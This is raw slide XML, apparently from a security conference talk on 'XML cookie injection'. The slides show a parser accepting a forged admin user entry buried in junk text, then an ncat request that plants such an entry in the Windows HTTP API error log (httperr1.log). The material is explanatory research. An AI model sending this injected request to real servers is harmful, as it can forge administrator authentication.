            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360040" y="1340768"/>
            <a:ext cx="8820472" cy="4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie.xml:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xml version="1.0" encoding="UTF-8"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" cookie=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dsecrg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" address=“10.10.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000"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31</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="2204864"/>
            <a:ext cx="6336704" cy="1008112"/>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7010728" y="2492896"/>
            <a:ext cx="657616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Valid</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Группа 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="323528" y="3429000"/>
            <a:ext cx="6408712" cy="1600438"/>
            <a:chOff x="323528" y="3429000"/>
            <a:chExt cx="6408712" cy="1600438"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="323528" y="3429000"/>
              <a:ext cx="5745291" cy="1292662"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>cookie2.xml.trash:</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>There is a good </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;user </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>xml file</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
                <a:t>!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>a</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>nd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>=“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>admin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>willbefound</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> as </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>cookie=“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>dsecrg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>a</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>nd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>address</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>=“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FA9816"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>10.10.0.1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>hooray</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>! </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>and blah-blah-blah</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Прямоугольник 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="384156" y="3771620"/>
              <a:ext cx="6348084" cy="1257818"/>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4" name="Прямоугольник 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384156" y="3771620"/>
            <a:ext cx="6348084" cy="1257818"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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7020272" y="4149080"/>
            <a:ext cx="657616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Valid</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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508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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14"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648"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML cookie Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1052736"/>
            <a:ext cx="8686800" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ncat targethost 49152</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /&lt;user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name="admin"cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pass"address=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; HTTP/1.0\r\n\r\n</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Номер слайда 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="3140968"/>
            <a:ext cx="8748464" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>windows\system32\logfiles\httperr\httperr1.log:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Software: Microsoft HTTP API 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Version: 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Date: 2011-08-22 09:19:16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Fields: date time c-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c-port s-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s-port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cs-uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-status </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smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>siteid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s-reason s-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>queuename</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2011-08-22 09:19:16 10.10.10.101 46130 10.10.9.9  47001 - - - 400 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BadRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2011-08-22 09:19:16 10.10.10.101 46234 10.10.9.9  47001 HTTP/1.0 </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GET /&lt;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="admin"cookie="pass"address="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
